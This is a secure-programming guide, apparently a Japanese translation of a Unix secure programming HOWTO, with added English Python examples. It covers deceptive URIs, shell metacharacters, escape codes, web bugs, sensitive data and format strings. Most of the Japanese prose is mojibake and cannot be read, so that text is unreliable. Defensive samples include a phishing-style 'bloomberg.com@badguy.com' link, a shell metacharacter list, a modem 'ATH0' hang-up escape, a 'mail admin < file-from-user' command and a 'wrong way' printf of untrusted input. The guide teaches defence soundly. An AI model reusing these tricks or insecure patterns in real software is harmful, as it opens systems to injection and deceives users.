uZ}eBbNUvƂ́AU҂Rs[^̐ݔVXe𗘗p
āA炩̕@ŋ]҂܂AĂ܂Ƃw܂B
Ƃ̂́A{̃Rs[^̐ݔVXes悤
ɐ݌vꂽ̂Ƃ͕ʂ̂ƂĂ܂Ƃw܂BZ}eBbN
Uɂ́AZ\܂܂ĂāAU҂]҂܂AU҂ɑ
^Ă܂܂(Ƃ΁AǂɓĂ悤Ɏv킹)B
΁AU҂̓[UɐMł Web TCgĂƐM܂悤
邩܂B{͂łȂ̂ɂ炸AłB

Z}ebNXU͑ΏłBR̓Rs[^̐
pĂ邩łBZ}ebNXUɑΏɂ́AɃ[Uɏ
^ċCÂ邱ƂłB܂uȁvƂNƁA[U
ƏƂƂ邩AxڂƈႤNĂƒm
܂B

ƂāAURI ܂B@薳ɂ炷A[U
Ⴆčl邩܂BƂƂ΁A URI ĂB

  http://www.bloomberg.com@www.badguy.com                              

 URI NbNƁA[U Bloomberg(Zij[X񋟂
Ă) ɍsƎv܂񂪁Â www.badguy.com ɍs
Ă܂܂ (āA[U www.bloomberg.com  www.badguy.com 
n܂A www.badguy.com ͓sǂƂɂ𖳎ł傤)B
badguy.com  Web TCg bloomberg.com ̃TCg܂˂ĂȂA[
U͎{̃TCgĂƁAMĂ܂܂(čU
҂Rg[ĂɁA[U߂Ă܂܂)B
͕igȂ URI OɂĂ܂BNbJu URI ̓[U
ݒł܂Ai͂Ă܂B̃P[X̉ɂ́AWeb
uEUigȂ URI mƂA|bvAbvŊmF߂
(u[U www.bloomberg.com  www.badguy.com ɃOC悤Ƃ
܂B܂Hv̂悤)d|邱Ƃl܂B̎d|
Ń[UύXł悤ɂȂ΁AUh䂪łƓɁA
[Uɑ΂Ēǉ@\񋟂ł܂B

ʂ̗́AԂňႤӖt(`ً`)ŁAɍԂɌ
铯`ً`łB镶݂͂ɎČ܂AlɂĂ
\܂BƂ΁A0([)O(̃I[)݂͂ɎĂ
̂ŁA[U WWW.BLOOMBERG.COM  WWW.BL00MBERG.COM Ⴄ Web Ah
Xł̂킩Ȃ܂BɌڂɂ́A1(
 1)l( L)܂B낢ȍ̕Ă΁A
Ԃ͂ɈȂ܂BƂ΁AL̑啔́A悻p
Ɠ悤Ɍ܂ARs[^͈Ⴄ̂ƂĈ܂B󂽂
ẴVXéAzXgƂĂ낢ȍ̕F߂Ă܂B
ƂȗRȂAzXgƂăT|[gKvLF
ł傤BĂ 1 ɁAقȂnقȂFgĕ\
@Ă܂B܂A[U͎oIɂƏ𓾂܂
B[U URI ƂƁA炭ȐFɋCt͂ł
[Gabrilovich 2002]BA̓Z}eBbNȖ݂͂
Ah킷͍̂łBmɌ΁ARs[^͐삵
̂łB
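How the two tricks in this section look to code: an added Python example (not from the HOWTO) that takes the http://www.bloomberg.com@www.badguy.com URI apart with the standard library and compares a host name against the expected one, allowing only look-alike substitutions such as 0/O and 1/l. CONFUSABLE_PAIRS, the function names and the expected-host argument are assumptions made here.

```python
from urllib.parse import urlsplit

# Character pairs that look alike in many fonts (constructed, not exhaustive);
# the section's own example is the digit zero versus the letter O.
CONFUSABLE_PAIRS = {frozenset("0o"), frozenset("1l"), frozenset("1i"), frozenset("il")}


def real_host(uri):
    """The host a browser actually connects to, ignoring any userinfo before '@'."""
    return urlsplit(uri).hostname or ""


def userinfo(uri):
    """The text before '@' in the authority, which a reader may mistake for the host."""
    return urlsplit(uri).username


def confusable_with(host, expected):
    """True if host differs from expected only by look-alike substitutions."""
    host, expected = host.lower(), expected.lower()
    if host == expected or len(host) != len(expected):
        return False
    for a, b in zip(host, expected):
        if a != b and frozenset((a, b)) not in CONFUSABLE_PAIRS:
            return False
    return True


def describe_uri(uri, expected_host=None):
    """Reasons a URI may not lead where a reader assumes; empty when nothing looks off.
    This is the kind of check a browser could show in a confirmation pop-up."""
    parts = urlsplit(uri)
    reasons = []
    if parts.username is not None:
        reasons.append("userinfo '%s' precedes the real host '%s'" % (parts.username, parts.hostname))
    if expected_host and confusable_with(parts.hostname or "", expected_host):
        reasons.append("host '%s' is a look-alike of '%s'" % (parts.hostname, expected_host))
    return reasons


if __name__ == "__main__":
    for uri in ("http://www.bloomberg.com@www.badguy.com", "http://www.bl00mberg.com/"):
        print(uri, "->", real_host(uri), describe_uri(uri, "www.bloomberg.com"))
```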

 

6.17. Be Careful with Data Types

gpĂf[^̎ނɒӂĂBC^tF[XɎgĂ
̂ɂẮAɒӂĂBƂ΁Ausignedvu
unsignedv̒ĺȂ(C  C++ ̂悤) ňقȂ󂯂
܂B

 

Chapter 7. Carefully Call Out to Other Resources

                                    Do not put your trust in princes, in
                                    mortal men, who cannot save.

                                                            Psalm 146:3

ۂ̂ƂA{̈ӖŎȊĂvO͂܂Bق
ׂẴvÓA\[X𗘗p̂ɑ̃vOĂяo
܂BƂ΁AIy[eBOVXe\tgEFAECu
񋟂vOłBɂ́Ȃ̃\[Xɑ΂ĂяoA
\ɌȂAȂĂ͎łȂȂ̐́uBꂽvd
g݂KvƂĂ肵܂BƂ΁AICu̎̎dgݓ
łBvOMĂ鑼̃\[XɂĐTdɂȂȂ΂
Ȃ͖̂炩łB܂Aɗv𑗂@ɂĂAmF
Ȃ悤ɂȂ΂܂B

 

7.1. Call Only Safe Library Routines

ZLeBƒۉ(B)̊Jjyт̍ėpeȂꍇ
܂B́Ax̃Cu[`SɎĂ
ȂA킩Ȃ_łBdlǂł킩܂B
SłƂĂA[`̑̃o[WmɈSł
Ƃ͌܂񂵁AC^tF[X̃vbgtH[łSł
Ƃ͌܂B 

ǂ̂ƂAAvP[VSɂȂ΂ȂȂȂAɂ͎
gŃCuE[`̃o[WĎ͂߂ɂȂ܂B
CuE[`KvƂZLeBvɓ邱ƂmFł
΁A{Iɉ̂Ƀ[`Ď𓾂Ȃł傤B
CÂɂȂƎv܂AꍇɂĂ̓Cu̎CK
v܂BAZLeB̎_CuE[`
IʁAQ̂̓[UłBĎȂ΂Ȃꍇ
ɂ́Ax̃C^tF[Xg悤ɂĂB΁A
̃C^tF[XSɎgVXeł́Ax̃C^tF[X
؂ւ܂B

\ȂA[`SłȂ̃eXgĂBĈ
SȂΎgp悤ɂĂBȂÃeXgRp
CCXg[Ɏsǂł傤(Ƃ΁AuautoconfvX
Nvg̈ꕔƂ)Bł́A̎̎seXg͌Ił
܂Bʂ̏ł͖̑Ă܂BCu
̍ĎɔY݂Ȃ΁AȂƂCuSł邱
mFAłȂꍇɂ̓CXg[𒆒fĂB
΁A[USłȂvOCXg[鋰ꂪȂ
ȂA肪ł邩𗝉ł܂B

 

7.2. Limit Call-outs to Valid Values

ʂ̃vOĂяoꍇ͂łAɃp^ƂėLO
ɗ\zĂlĂ邱ƂmFKv܂B
͌ƍłBƌ̂A܂܂ȃCu֐R}
hA჌x̊֐ӊOȕ@ŌĂяoĂ邩Ȃł
BƂ΁AVXeR[̑͊ԐړIɃVFs܂B
蕶n̂ɓāAVF̃^LN^댯ȌʂN
\܂Bł́AŃ^LN^ɂĘ_܂傤B

 

7.3. Handle Metacharacters

VXȇAƂ΃R}hCEVF SQL C^v^ɂ́A
u^LN^v݂܂B܂͒̂镶Af[^Ƃ
߂܂B̂悤ȕ̓R}hłAR}h⑼̃f[
^炠f[^ʂ邽߂̎ʎqł肵܂BgpĂV
XẽC^tF[XɌdlȂAƃ^LN^܂
Ă͂łBvÕVXes悤ɂȂĂāA
U҂̂悤ȃ^LN^ꍞ߂ȂAU҂͊SɃvO
Rg[Ă܂AƂ̂܂̌łB

^LN^̖ōłL͈͂ɓnĂ̂́AVF̃^LN
^łBWI Unix CNȃR}hEVF(/bin/sh )́A
̐̕ʈ܂B̕VFɓnƁAGXP[v
ĂȂAʂɉ߂܂B̎pāAvO
Ă܂B WWW Security FAQ [Stein 1999, Q37]ɂ΁A
̂悤ȃ^LN^͉L̂̂łB

& ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r                       


ӂׂ́A^u󔒕GXP[vʂ낢날̂ł
AƂ_łB(Ɖs)̓p^̃ftHg̃Zp^
BZp^̒l IFS ϐݒ肵ĕύXł܂A̕ϐ̏o
MpłȂȂA̒lj邩Aϐߒŉ炩
̕@ŃZbgĂB

ɂASȃXg͌ɂ݂͑܂Bł͋^킵Ǝv
镶𑼂ɂĂ܂B

 E u!v͎ł͂܂(C ł͎ł)BvO̕ԂleXg
    ȂAړ ! ƁAXNvg\Ďۂɂ͐Ă
    悤AsĂ悤֌WȂAs悤ɂȂ܂BV
    Fɂ́AR}hɃANZX̂ɂu!vĝ܂
    BꂪɖɂȂꍇ܂B bash ł͂͑Θb[h
    ̏ꍇɂ܂Atcsh(csh ̃N[ŁAĂ Linux
    fBXgr[V܂)ł́u!vXNvgłg
    ܂B
   
 E u#v̓RgƂĎg܂B̕ȍ~̃eLXg͖
    ܂B
   
 E u-v͊ԈăIvV̊JnƉ߂鋰ꂪ܂(
    A-- ƂāAׂẴIvV@\𖳌ɂĂ܂)BƂAt
    @ĆuɁvĂƂĂAVFOɋ󔒂ƔF
    ܂ƍƂɂȂ܂B
   
 E uv()u\tv(^u)Au\nv(s)Au\rv(^[)Au\vv
    (Xy[X)Au\fv(tH[EtB[h)̋󔒕́Au1 v
    ̃t@C𕡐̈ɂĂ܂܂B
   
 E ̑̐䕶( NIL)́AVF̎ɂĂ͖N
    ܂B
   
 E gɂ܂Au.v(uJgVFŎsv)u=v(ϐ
    ݒ) ́AȕłBA܂ŌĂ̌ł́A
    ̑(Ɩ)ZLeB̖肪݂Ă܂B
   
 

VF̃^LN^̉eL͈͂ɂȂĂ܂Ă̂́A
̏dvȃCuER[AƂ popen(3) system(3)AR}
hVFĂяoĎs邩łB܂AVF̃^LN^
e󂯂Ă܂Bl execlp(3) execvp(3)VFĂяo
dg݂ɂȂĂ܂B popen(3) system(3)Aexeclp(3)Aexecvp(3)
gpȂ悤ɒĂĂKChCAvZX𐶐
ꍇɂ execve(3) C ꂩ璼ڌĂяo悤ɒĂĂ܂
[Galvin 1998b]BƂɂAexecve(3)gȂAsystem(3)̎gp
ĂBsystem(3)̓VFgĕWJ܂̂ŁA댯
L܂Bl Perl VF̃obNNH[g(`)R}hVF
яo܂B Perl ɂĂ̏ڂ Section 9.2ĂB

SQL ɂ^LN^܂̂ŁA悤Ȗ肪 SQL ̌Ăяo
݂Ă܂B SPI Dynamic's paper ``SQL Injection: Are your Web
Applications Vulnerable?'' <http://www.spidynamics.com/papers/
SQLInjectionWhitePaper.pdf> ĂB̓_ɂĂɘ_
܂傤B Chapter 4Ř_ʂAɌIȃp^`āA
p^Ƀ}b`͂悤ɂĂBp^ ^[0-9]
$  ^[0-9A-Za-z]*$ ɐĂȂA͋NȂł傤
B SQL ^LN^f[^KvȂAʂ
ɕϊĂ(ł邾)AۑĂBƂ΁A
HTML GR[ĥ悤(̏ꍇ́AApTh𕄍ĂK
v܂)B܂pŃ[Uׂ̓͂Ă͂łBƂf
[^łĂłB΁A󔒂⑼̎ނ̃f[^͊댯ł
ȂȂ܂B

̕ 1 łYƍГ邩܂BƂ΁Av
Ȏ́AobNXbVVF̃^LN^Ƃč폜
܂܂ [rfp 1999]B Chapter 4Ř_悤ɁA@́A
͂ꂽ炷A̕ƂGXP[v@łBA
͂邩ɓK؂ȉ@́Aǂ̕̂œ肷@
BāA̕悤ɃtB^܂B

vOɂ́AlԂƂ肷ׂ݌vꂽ̂񂠂܂
B̂悤ȃvÓAuʂȁvsׂuGXP[vvR[h
܂BƈʓI(Ŋ댯)ȃGXP[vR[h 1 ɁAR}h
C𗧂グƂ̂܂B̂悤ȁuGXP[vvR}h
Ζ悤ɂĂ (Ȃ΁ÃR}hmɈS
悤ɂĂ)BƂ΁AR}hCw̃[EvO
(mail mailx ̂悤)ł́A`_(~)GXP[vLN^ƂĎg
Ă܂B`_͑ʂ̃R}h𑗂ꍇɎgĂ܂B炩
ɖQȃR}hAƂ΁Aumail admin < file-from-uservAʓI
Cӂ̃vOŝɗpł܂B vi  emacsAed ̂悤ȑ
b`̃vÓAuGXP[vvdg݂ĂāA[Uv
OsɔCӂ̃VFER}h𑖂点܂BĂяovO
̃hLgׂāAGXP[vdg݂Ȃ
B̃vOĂяoȂAp̂Ăяo
ɂ̂K؂łBSection 7.4 ĂB

GXP[vR[h́AΏ۔͈͂჌xȃn[hEFA̕
i₻G~[ĝɂ܂ōL܂Bfɂ͂Ău
HayesvƌĂ΂Ă閽߃ZbgĂ܂B̖߃ZbgL
ɂȂĂƁAx𔭐u+++vƂt[Y₻ɂƂȂ
̒xɂāÃR}hɑeLXgfɑ΂R}hƉ
߂܂B̓T[rXۍU̎sɗpł܂(uATH0v𑗂
ƂŁAfnOAbv܂)A[Uʂ̏ɐڑ邱Ƃ
\ł(IȍU҂ȂU҂䂵Ă}VoR悤ɁA
[U̐ڑ̌oHςĂ܂܂)BP[XfɌ肷΁AΏ
̂͊ȒPł(Ƃ΁Af̏uATS2-255vĂ
܂)B܂ʓIȖ͎cĂ܂B჌xȕi₻̃G~
[^𐧌䂵ĂȂAKɑgݍłGXP[vR[h
ɂ邩A΍{ĂB

u[vC^tF[Xł́AɂȂȂċv VT100 ̂悤Ȑ̂̒[
̃GXP[vR[hĂP[X܂BR[h͂
Ă֗ŁA[̃C^tF[XgāAƂΕ𑾂At
Hg̐FςÄʒuɈړł܂BAڒ[
̃XN[ɔCӂ̐MłȂf[^̑oF߂Ă͂܂BƂ
̂́AR[hɂĂ͏dȖN̂邩łBVX
eɂ́AL[̊蓖ĂύXł̂܂(Ƃ΁A[Uu
Enterv̓t@NVL[ƂŁA]݂̃R}h𑗂Ď
sł܂)Bɂ́AR[h𑗂ăXN[NAA]҂Ƃ
lɎsR}h\ł肷̂܂B\
āAʂuɖ߂v߂𑗂āAL[̂҂ɍU
҂I񂾖߂sĂ܂܂B͒ʏuy[W[hEobt
@OvƂ@\gĎĂ܂B̃ZLeB̖
Az tty(foCXt@CƂĒ񋟂ĂāAʏ /dev ɂ
)L҂ɂ݂\ŁAɂ͒N߂Ȃ悤ɂׂ
闝RɂȂĂ܂Bāȗ̏݁vp[~bVݒ
ĂĂ͂܂B܂A[UO[v(܂u[UvCx[
gO[vvƂ@)̃o[łȂȂAuO[vɂ鏑
݁vp[~bV[ɑ΂Ăׂł͂܂[Filipski 1986]
B[Uɑ΂ăf[^([)[ŕ\ĂȂASmFĂ
Ȃ肷ׂĂ̐䕶(32 l̕)tB^āA[U
ɖ߂f[^菜Kv܂Bň̏󋵂ł́A^us(
炭As)SƂŁAc肷ׂĂr܂BnCrbg
Ă镶(܂ 127 傫l)ɂ̓eNjbNv܂B
VXeɂ́ArbgĂȂƂsĂ܂̂
BPɂ̕tB^OƁA낢ȍ̌t
gpւĂ܂܂B̏ꍇ̓P[XɉČĂKv܂
B

Ɋ֘AāANIL LN^(LN^ 0)ӊOȉeyڂ
܂B C  C++ ̊֐̑啔́ANIL LN^̏I
[̈Ƒz肵Ă܂Ǎ(Perl  Ada95 )̕֐
 NIL 𕶎̈ꕔƂĈ܂BCuJ[ľĂяo C
̈𓥏PĂ܂̂ŁA`FbNeƎێgpev
܂[rfp 1999]B

̃vOĂяoAt@CQƂ肷鎞ɂ́At
pX (Ƃ /usr/bin/sort)̂悤)Ŏw肷悤ɂĂB
邱ƂŁAuԈvR}hĂяoۂɐG[𖳂
łȂAPATH ϐԈĐݒ肳ĂĂG[ł܂
B̃t@C̎QƂɂĂAuԈvJnpXw肵ʐ
点܂B
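The advice of 7.3 collected into one added Python example (not the HOWTO's code): a check for the WWW Security FAQ metacharacter list quoted above, a positive argument pattern that extends the ^[0-9A-Za-z]*$ pattern mentioned in this section with '.', '_' and an internal '-', command construction with an absolute program path, no shell and a '--' separator, removal of the 32 control values, DEL and high-bit bytes before echoing data to a terminal, and a bound-parameter SQL query in place of string concatenation. The in-memory database and all sample strings are constructed for the example.

```python
import re
import sqlite3
import subprocess

# Shell metacharacters as listed by the WWW Security FAQ in this section.
SHELL_METACHARS = set("&;`'\\\"|*?~<>^()[]{}$\n\r")
# Whitespace, '!', '#' and a leading '-' are the further cases the section discusses.
SHELL_SUSPECT = SHELL_METACHARS | set(" \t\n\r\v\f!#")

# Positive pattern for an argument: a letter or digit first, so no argument can start
# with '-' and be taken for an option; '.', '_' and '-' are allowed afterwards
# (an extension, made here, of the section's ^[0-9A-Za-z]*$).
SAFE_ARG = re.compile(r"[0-9A-Za-z][0-9A-Za-z._-]*")


def has_shell_metachar(s):
    """True if the string contains anything a Unix shell would treat specially."""
    return any(c in SHELL_SUSPECT for c in s)


def validate_arg(s):
    """Accept an argument only if it matches the positive pattern; NUL is rejected
    explicitly because C-based interfaces would silently truncate the string there."""
    if "\0" in s:
        raise ValueError("NUL byte in argument")
    if not SAFE_ARG.fullmatch(s):
        raise ValueError("argument %r does not match the allowed pattern" % s)
    return s


def build_command(program_path, user_args):
    """argv for a direct execve-style call: absolute program path (no PATH lookup),
    no shell, and '--' so user-supplied arguments are never parsed as options."""
    if not program_path.startswith("/"):
        raise ValueError("program must be given by absolute path")
    return [program_path, "--"] + [validate_arg(a) for a in user_args]


def run_command(argv):
    """Run the argv list without a shell (the analogue of execve rather than system(3))."""
    return subprocess.run(argv, shell=False, check=True, capture_output=True, text=True).stdout


def strip_terminal_controls(data):
    """Drop the 32 control values, DEL (127) and high-bit bytes before echoing untrusted
    bytes to a terminal; tab and newline are kept, the most restrictive usable choice."""
    return bytes(b for b in data if 32 <= b < 127 or b in (9, 10))


def lookup_user(conn, name):
    """SQL: bind the user's value as a parameter so SQL metacharacters are data, not syntax."""
    return conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchall()


def demo_db():
    """Constructed in-memory database for the SQL example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    return conn


if __name__ == "__main__":
    print(build_command("/usr/bin/sort", ["data.txt"]))
    print(strip_terminal_controls(b"\x1b[2Jhello\x07\n"))
    print(lookup_user(demo_db(), "alice"))
```

validate_arg is deliberately narrow: for real file names you would widen the pattern to what your application needs, but keep the positive form and keep the first-character restriction; rejecting a short list of known-bad characters is the approach the section warns against.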

 

7.4. Call Only Interfaces Intended for Programmers

vOɗpӂĂAvP[VEvO~OEC^
tF[X (API)Ăяo悤ɂĂBʏvO͑̃v
OĂяo܂Bɂ́AۂɐlƂ肷悤ɐ݌v
vO܂܂܂BvOĂяôɁAl
悤ɃvO݌v̂ł͏\ł͂܂BvÕq
[}EC^tF[XƂ@\Lxł邪̂ɁAɐ䂷
̂ɂȂĂ_ɂȂ܂B Section 7.3 Ř_悤ɁA
bIȃvOɂ́uGXP[vvR[h悭܂BȂƁAU
҂sK؂ȋ@\słĂ܂܂B܂AΘbIȃvÓu
낤vƂftHg̐ݒs悤Ƃ܂Bꂪ
ĂftHg̓ł͂Ȃ܂BU҂́Aɂ
ގi邩܂B

ʏ풼ڌĂяoĂ͂ȂvOɂ́Amail  mailxAedAviA
emacs ܂BŒ̃vO̓͂܂`FbNĂ
AĂяoĂB

ʏ͈SȃANZX邽߂ɁAvO@\Ƃăp^
Aʂ API ĂAgȂŃvOp̃AvP
[V肵܂BƂ΁AeLXgEGfB^(ed  viAemacs
̂悤)ĂяoăeLXgҏWɁAsed g܂B

 

7.5. Check All System Call Returns

VXeR[ŃG[󋵂Ԃ̂́AׂẴG[Ԃ`Fb
NKv܂B܂RƂĂ̂́AVXeR[̂
ƂǂׂĂAꂽVXeE\[XΏۂƂĂÃ\[
Xɑ΂ă[U͂܂܂ȕ@ŉe^邩łB setuid 
setgid ꂽvOɂ́Asetrlimit(3) nice(2)̂悤ȃVXeR[
ĂяoƂŁÃvOŎgp郊\[X̐ł܂B
T[ovO𗘗pÕ[U CGI XNvǵAɑʂ
NGXgT[oɗvă\[XHׂ܂BG[K؂Ɉ
ȂȂ΁AɏqׂtFCEZ[tɂĂB

 

7.6. Avoid Using vfork(2)

Unix CNȃVXeŐVvZXȒPɂڐAč쐬
ɂ́Afork(2) VXeR[gp܂B BSD  vfork(2)ƌĂ΂
VXeR[𓱓āA@̍œK}܂B vfork(2) fork(2)
Ƃ͈قȂAexecve(2V)ĂяoAexit ܂ł́AqvZXev
ZX̃␧Xbh؂Ă܂BevZX͎qvZX
\[XgĂԁATXyh܂BÂ BSD ł fork(2)
ۂɃRs[̂ɑ΂āAvfork(2)ł͂Ȃ_{łB
Linux ł̖͂͂܂܂BȂȂALinux ͓ł̓R
s[EIECggĂāAύXɂy[WRs[
܂ (ۂ́Aɂ܂Rs[Ȃ΂Ȃe[u
݂܂B啔̓ł́ÃI[o[wbh͂قǏd͂
܂)Bɂ炸Avfork(2)gvO݂
ŁAŋ߂ɂȂ Linux  BSD  vfork(2) ܂(܂ł
Avfork(2)  fork(2)̃GCAXł)B

vfork(2) ɂ͂Ȃ肪܂BڐA̓_炷ƁAvfork(2)́Ae
vZXɊȂ悤ɂ̂ɁÂƂ납ȂgbL[Ƃ낪
܂BɍxȌɂĂ̓_łBuȂv
ɂɂ́Aۂɐ}VR[hɔfKv܂B
ARpC͕\ɏoȂꎞIȐ\zO̊NR[h
\Ă܂P[X܂B_ƂāAvfork(2)gĂv
ÓAR[hςARpC̃o[Wς肷
łĂ@\ȂȂ܂B

Linux VXëSKvȃvOɂƂāA͂ɏ󋵂
܂BȂȂALinux(ȂƂo[W 2.2  2.2.17 ܂)
vfork()̎ɋԂNƎ㐫邩łB Linux œv
ZX[ŨR}hŝ vfork(2)  execve(2) yAŎg
ĂƁAԂ܂BqvZXɃ[U uid œ삵
邪Aexecve(2)͂ĂȂP[XłB[U SIGSTOP ܂ރVOi
̃vZXɑ邩܂B vfork(2)ł́A
evZXqvZXƓlɃubN܂BʓIɁA
ȂvZXAvZX𒆒f܂B܂肱
AvZX̃T[rXɑ΂T[rXۍUɂȂ܂B
ȂƂ FreeBSD  OpenBSD ł́ÃP[XɑΏR[hĂ
܂B̖ɑ΂Ǝ㐫́AmĂ肠܂B Solar
Designer ɊӂĂ܂Bނ 2000 N 10  7  security-audit
[OXg Linux ɂāA̖ɌyA؋Ă
B

vfork(2)ɂāA_͂͂肵Ă܂BvOł vfork(2)g
ȂAłB͓̂Ȃ͂łBvfork(2)Ɏgp
́Avfork KvƂĂÂvOT|[g邽߂
B

 

7.7. Counter Web Bugs When Retrieving Embedded Content

f[^tH[}bgɂ́ARecւ̎QƂgݍނ߂̂܂
B̎QƂ́Af[^ɎIɓǂݏo܂([UI
҂)B̃f[^C^[lbgoR(SEL)œǂݏo
ȂA̋@\gēǎ҂ɂĂ̒mȂĂA擾ł
\܂B܂ꍇɂẮAǎ҂ɏ𓾂Ȃ܂܋Iɓ
邱Ƃ\łB̃vCoV[Ɋ֘AuWeb oOvƌ
ԏꍇ܂B

Web oOgāAhLg̒ɂ炩ߎQƂ𖄂ߍ݂܂BR
ec̒҂́ANAǂŁAǂȕ@ŃhLgǂ񂾂̂ǐ
̂ɁA𗘗p܂B܂҂͊{Iɂ͂ǂ̂悤Ɂu݌
ĂvhLglʂ̐lցAgDʂ̑gDւƂǂ
悤ɓnĂ̂܂B

HTML tH[}bg͈ȑO炱̖Ă܂B Privacy
Foundation <http://www.privacyfoundation.org> ɂ΁A

   
    C^[lbgōLЂ́A Web oO Web y[WōL
    pĂ܂B܂ǐՒs߂ HTML x[X̓dq[
    łgĂ܂B́Aʑ傫 1 x 1 sNZŁAXN
    [ł͖ڂɌAǐՒɎgĂ̂BĂ܂B
    A(img ^Og)摜ł͂܂B Web oO
    sĂ HTML ^Oɂ́AƂ΁At[tH[ĂяoAX
    Nvg܂BPƂ Web oOsƁuvTCgɑ΂
    āAǎ҂ IP AhXǎ҂Kꂽy[WAuEUɂĂ̂
    ܂ȏ񋟂܂BNbL[킹ėpƁAǎ҂ʂ
    ł悤ɂȂ܂B Web oOɂĂ̊TvɂẮA http:
    //www.securityspace.com/s_survey/data/man.200102/webbug.html Ō
    ܂B
   
ƐSzȂ̂́ÃhLg̃tH[}bĝ悤ȋ@\
Ă悤Ɍ_łB Web TCgɂ HTML  Web uEUŌ
ɁANf[^uEWOĂ邩Ƃ擾@ʂ
܂BAdq[̂悤ȕʂ̃tH[}bg̃hLg
鎞ɁAhLgǂ񂾂ŊĎĂ܂Ƒzł郆[U
قƂǂ܂BƂ΁Aŋ߂ɂȂ Microsoft Word  Web oÕT
|[g肵܂B the Privacy Foundation advisory for more
information <http://www.privacyfoundation.org/advisories/
advWordBugs.html> ĂB̊ŌyĂ悤ɁAŋ߂
o[W Microsoft Excel  Microsoft Power Point ݌ł܂
BꍇɂẮANbL[͂ɏ擾̂ɗpł܂B

Web oÓAɃt@CtH[}bg̐݌vɓĖƂȂ܂B
[UvCoV[厖ɂȂA炭t@C܂ގIȃ_
E[hɐȂ邵傤Bt@Ĉ_E[h
(܂AWeb uEUoR)́AO 1 łB̃t@C𓯂
瓯ԂɃ_E[hĂA[Uɂ͂قƂǊ֌W܂B

 

7.8. Hide Sensitive Information

閧ɂ́AFDȖڂ猩Ȃ悤ɂׂłB͂ł
Ăo͂łĂAVXeɕۑĂ鎞ɂׂ͂łB
ɂɂ́ANWbgJ[h̔ԍ⒙̎cȀZ
K܂܂܂B܂AAvP[V͖Odq[̃AhX
vCx[gȏ񈵂Ă܂B 

Web x[X̃AvP[V́A[UƂ̒ʐMɔ閧ɂ񂪂
ȂAׂĈÍKv܂Bʂ́AuhttpsvvgR(HTTP
 SSL  TLS ɂ̂Ă)g܂B HTTP 1.1 ̋Ki(IETF RFC 2616
ZNV 15.1.3)ɂ΁AHTTP vgRgăT[rX񋟂Ă
钘҂́AGET x[XɂtH[閧ɂf[^̓o^Ɏgp
ׂł͂ȂƂĂ܂BƁÃf[^NGXg URI 
ēĂ܂łB̃T[ovNVA[ŨG[
WFg̑́ANGXg URI ǂɋL^A̋L^O
猩Ă܂܂B GET ̂ɁA̖ړIɌĂ
POST x[Xœo^gĂB 

閧̃f[^f[^x[Xł́ALu(fBXÑt@C
) ÍĂׂłB̂悤ȈÍĂAU҂S
KvȃAvP[Vj󂷂sׂh܂񂵁ARȂAvP
[V́AÍf[^ɃANZX鉽炩̎ipӂȂ
Ȃ܂BAf[^obNAbvp̃fBXNǂɂ
悤ƂU҂ɑ΂ẮAhɂȂ܂Bf[^̕Ɏgp
錮𓾂悤ƂUɑ΂ẮAʂ܂B܂AU҂Av
P[Vɂ܂܂ƐNłȂΖhɂȂ܂BA֘A
VXëꕔɐNł΁AۊǂĂf[^̂ɂ͏\
B̏ꍇAU҂͈ÍASYjȂ΁Af[^擾
ł܂Bf[^spӂɈړĂ܂P[X񂠂܂(
 core t@C) Ah܂BڂׂȂ̂́Av
قǂꂪ͂Ȗhɂ͂ȂȂ_łBT[ogĂ܂\
邩łB

 

Chapter 8. Send Information Back Judiciously

                                    Do not answer a fool according to his
                                    folly, or you will be like him
                                    yourself.

                                                           Proverbs 26:4
 

8.1. Minimize Feedback

MłȂ[Uɑ΂ẮȀ񋟂Ȃ悤ɂĂ
BAsāAsĂsƌɂ
āAȂsɂẮAł邾Ȃ悤ɂĂB
ׂȏ̓[U̍Ղ؂OɕۑĂBƂ΁A

 E vOɉ炩̃[UF؂Kvȏꍇ(Ƃ΃lbg[NT[
    o⃍OCEvO쐬Ă)AFؑO̒iKł́A[U
    ͂ł邾^Ȃ悤ɂĂBɔFؑOɃvO
    ̃o[Wio[R炷ƂȂ悤ɂĂB
    ȂƁÃo[W̃vOɌ邱Ƃ킩Ă܂
    ꍇÃo[WAbvO[hȂ[UU҂ɂ݂
    ݂Ă܂ƂɂȂĂ܂܂B
   
 E vOpX[hvꍇA͂\Ă͂܂B
    pX[h΂錴 1 ɂȂĂ܂܂B
   
 

 

8.2. Don't Include Comments

Ԃɂ́A󂯎郆[UɃRgĂ悢Ɩ]
Ȃ́AuRgvĂ͂܂Bt@C(HTML ̂悤)
쐬 Web AvP[Vɂ̖͌łB Web AvP[V
̃vO}́A̍iɃRgꂽ(͗ǂƂ
)܂AR[hɂRgcłȂA쐬t@C (
ʂ HTML  XML)̈ꕔƂĊ܂߂܂Bꂪ[UɕԂ܂B̃R
gɂ̃VXeǂ̂悤ɓ삵Ă邩i񋟂
AU҂邱ƂɂȂ܂B

 

8.3. Handle Full/Unresponsive Output

S߂vOŁA[U֏o͂ߒl܂点Ao
̔x邱ƂA[UɂƂĉ\܂BƂ
΁AWeb uEU͌̈ӂ TCP/IP ̌oHؒfAxx
ł܂B̂悤ȃP[Xɑ΂ĂAS߂vO͑
ׂłBɃbN݂͂₩ɊO悤ɂׂł(łΔ
ԂO)B΁AT[rXۍǓł悤ȂƂ͂
Blbg[Nւ̏ݗv́AɃ^CAEgݒ肷ׂł
B 

 

8.4. Control Data Formatting (Format Strings)

Rs[^ɂo̓[`́A𐧌䂷p^
P[X܂B C ōł悭mꂽႪ printf()ñ[`
(printf() sprintf()A snprintf()Afprintf())łB C ł̗̑
syslog()(VXẽO) setproctitle() (vZXʎq̏
𕶎ŕ\̂Ɏgp)łB֐ɕtÓAuerrvuwarnv
ł͂܂Aulogv܂܂ĂAuprintfvŏI肵Ă
_ɒӂ鉿l͂܂B Python ́u%vZqĂāA
Ə𓯂悤ɐ䂵܂BvO⃉Cȗ́AtH
[}bg@\`ĂāAʂ͑gݍ݃[`ĂяoAɏ
܂(Ƃ΁Aglib  g_snprintf()[`̂悤)B

ӊOɂÃtH[}bg@\тĂ悤ɎvX
񂢂āAMłȂ[Ũf[^Ap^Ƃėp
Ă܂BtB^邱ƂȂɂ́AMłȂ[Ũf[^
p^ƂĎgpȂłBƂĂ҂Ȃ̂L
B

  /* Wrong ways: */
  printf(string_from_untrusted_user);
